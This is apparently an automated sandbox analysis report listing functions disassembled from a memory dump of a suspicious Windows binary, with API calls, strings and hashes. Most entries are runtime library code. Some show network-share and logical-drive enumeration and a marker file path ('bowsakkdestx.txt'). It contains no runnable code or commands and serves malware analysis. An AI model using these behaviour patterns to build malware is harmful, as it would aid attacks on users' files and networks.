Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00425141 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00425141

Part of subcall function 00427D6C: EncodePointer.KERNEL32(00000000,?,00425146,00423FFE,00507990,00000014), ref: 00427D6F
Part of subcall function 00427D6C: __initp_misc_winsig.LIBCMT ref: 00427D8A
Part of subcall function 00427D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004326B3
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004326C7
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004326DA
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004326ED
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00432700
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00432713
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00432726
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00432739
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0043274C
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0043275F
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00432772
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00432785
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00432798
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004327AB
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004327BE
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004327D1

__mtinitlocks.LIBCMT ref: 00425146
__mtterm.LIBCMT ref: 0042514F

Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B62
Part of subcall function 004251B7: _free.LIBCMT ref: 00428B69
Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(0050AC00,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B8B

__calloc_crt.LIBCMT ref: 00425174
__initptd.LIBCMT ref: 00425196
GetCurrentThreadId.KERNEL32 ref: 0042519D

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
Instruction ID: 366d1241f395ce705af539ece55ec53f654f371a685379b5f067519d47a60e56
Opcode Fuzzy Hash: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
Instruction Fuzzy Hash: 75F0CD32B4AB712DE2343AB67D03B6B2680AF00738BA1061FF064C42D1EF388401455C

Uniqueness

Uniqueness Score: -1.00%

Function 004253AE Relevance: 9.0, APIs: 6, Instructions: 50COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 0042594A

Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22

_free.LIBCMT ref: 00425970

Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13

__lock.LIBCMT ref: 00425989
___removelocaleref.LIBCMT ref: 00425998
___freetlocinfo.LIBCMT ref: 004259B1
_free.LIBCMT ref: 004259C4

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
String ID:
API String ID: 626533743-0
Opcode ID: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
Instruction ID: 81c7b0a8007453265eca5a285afc690957d7e654b57493ebbede42104a270bc8
Opcode Fuzzy Hash: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
Instruction Fuzzy Hash: E801A1B1702B20E6DB34AB69F446B1E76A0AF10739FE0424FE0645A1D5CFBD99C0CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 004506A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119COMMONLIBRARYCODE

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 004507C3

Strings

func(%lu), xrefs: 00450734
error:%08lX:%s:%s:%s, xrefs: 00450792
lib(%lu), xrefs: 0045071C
reason(%lu), xrefs: 00450758

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: ___from_strstr_to_strchr
String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
API String ID: 601868998-2416195885
Opcode ID: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
Opcode Fuzzy Hash: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96

Uniqueness

Uniqueness Score: -1.00%

Function 0045AE30 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045AE4B
_memset.LIBCMT ref: 0045AE6C

Strings

.\crypto\buffer\buffer.c, xrefs: 0045AE88, 0045AEBE, 0045AED3, 0045AEF0
g9F, xrefs: 0045AE31, 0045AE36, 0045AE63, 0045AF14, 0045AF1D

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: _memset
String ID: .\crypto\buffer\buffer.c$g9F
API String ID: 2102423945-3653307630
Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9

Uniqueness

Uniqueness Score: -1.00%

Function 004C5D39 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 004C5D3D

Part of subcall function 0042501F: GetLastError.KERNEL32(?,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425021
Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425083

__calloc_crt.LIBCMT ref: 004C5D60
__get_sys_err_msg.LIBCMT ref: 004C5D7E
__get_sys_err_msg.LIBCMT ref: 004C5DCD

Strings

Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
API String ID: 3123740607-798102604
Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD

Uniqueness

Uniqueness Score: -1.00%

Function 00462FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

_fprintf.LIBCMT ref: 0046307E
_memset.LIBCMT ref: 004630AB

Strings

.\crypto\pem\pem_lib.c, xrefs: 00463097
Enter PEM pass phrase:, xrefs: 00463036, 00463043, 00463084
phrase is too short, needs to be at least %d chars, xrefs: 00463070

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: _fprintf_memset
String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
API String ID: 3021507156-3399676524
Opcode ID: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
Opcode Fuzzy Hash: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA

Uniqueness

Uniqueness Score: -1.00%

Function 0040C500 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539

Strings

bowsakkdestx.txt, xrefs: 0040C52D

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: Path$AppendFolder
String ID: bowsakkdestx.txt
API String ID: 29327785-2616962270
Opcode ID: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
Opcode Fuzzy Hash: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
ShowWindow.USER32(00000000,00000000), ref: 0041BABE
UpdateWindow.USER32(00000000), ref: 0041BAC5

Strings

LPCWSTRszTitle, xrefs: 0041BA9B
LPCWSTRszWindowClass, xrefs: 0041BAA0

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: Window$CreateShowUpdate
String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
API String ID: 2944774295-3503800400
Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C

Uniqueness

Uniqueness Score: -1.00%

Function 00410BD0 Relevance: 7.7, APIs: 5, Instructions: 234sharememoryCOMMON

Download Yara Rule

APIs

WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00410C12
GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00410C39
_memset.LIBCMT ref: 00410C4C
WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: Enum$AllocGlobalOpenResource_memset
String ID:
API String ID: 364255426-0
Opcode ID: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
Opcode Fuzzy Hash: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004416EB Relevance: 7.6, APIs: 5, Instructions: 112COMMON

Download Yara Rule

APIs

__getenv_helper_nolock.LIBCMT ref: 00441726
_strlen.LIBCMT ref: 00441734

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

_strnlen.LIBCMT ref: 004417BF
__lock.LIBCMT ref: 004417D0
__getenv_helper_nolock.LIBCMT ref: 004417DB

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
String ID:
API String ID: 2168648987-0
Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction ID: 706a9fbf285425ec29b4e33d2635255339e15eb248031f995e6227ac9da9c0f4
Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction Fuzzy Hash: A131FC31741235ABEB216BA6EC02B9F76949F44B64F54015BF814DB391DF7CC88046AD

Uniqueness

Uniqueness Score: -1.00%

Function 00410A50 Relevance: 7.6, APIs: 5, Instructions: 104COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 00410A75
SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
PathFileExistsA.SHLWAPI(?), ref: 00410AF9
SetErrorMode.KERNEL32(00000000), ref: 00410B02
GetDriveTypeA.KERNEL32(?), ref: 00410B1B

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
String ID:
API String ID: 2560635915-0
Opcode ID: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
Opcode Fuzzy Hash: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97

Uniqueness

Uniqueness Score: -1.00%

Function 0043ACEB Relevance: 7.6, APIs: 5, Instructions: 84COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043ACEE
_memset.LIBCMT ref: 0043AD19
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,?,00000000,?), ref: 0043AD76
GetLastError.KERNEL32(?,?,00000000,?), ref: 0043AD92
_memset.LIBCMT ref: 0043ADA8

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: Locale_memset$ByteCharErrorLastMultiUpdateUpdate::_Wide
String ID:
API String ID: 742067911-0
Opcode ID: d3d8bdbd0f91ce1f2c1441d5a3417d514f9a6198b0ac422b572c140bfb1cf56f
Instruction ID: c9ecf35b62825572b9c8e62b4d797814e3822faa64b6dd1b63504df10073b233
Opcode Fuzzy Hash: d3d8bdbd0f91ce1f2c1441d5a3417d514f9a6198b0ac422b572c140bfb1cf56f
Instruction Fuzzy Hash: D821F3306402159BDB219F92D884ABF3B66DF45716F48506BF8944AB81DB3C8C21CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0043B6FF Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0043B70B

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: HeapAlloc.KERNEL32(00700000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

_free.LIBCMT ref: 0043B71E

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: AllocHeap_free_malloc
String ID:
API String ID: 2734353464-0
Opcode ID: ac30be484878ed1c1fbcd2781803b0d6d497061a6a5de6108b0294a208768cdb
Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
Opcode Fuzzy Hash: ac30be484878ed1c1fbcd2781803b0d6d497061a6a5de6108b0294a208768cdb
Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC

Uniqueness

Uniqueness Score: -1.00%

Function 0041F070 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041F085
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0AC
DispatchMessageW.USER32(?), ref: 0041F0B6
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0C4
WaitForSingleObject.KERNEL32(0000000A), ref: 0041F0D2

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041E500 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041E515
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E53C
DispatchMessageW.USER32(?), ref: 0041E546
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E554
WaitForSingleObject.KERNEL32(0000000A), ref: 0041E562

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041FA40 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FA53
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA71
DispatchMessageW.USER32(?), ref: 0041FA7B
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA89
WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4

Uniqueness

Uniqueness Score: -1.00%

Function 0041FDF0 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FE03
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE21
DispatchMessageW.USER32(?), ref: 0041FE2B
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE39
WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00417BA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00417C6A
_memmove.LIBCMT ref: 00417CD4

Strings

invalid string position, xrefs: 00417D2C
string too long, xrefs: 00417D36

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
Opcode Fuzzy Hash: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9

Uniqueness

Uniqueness Score: -1.00%

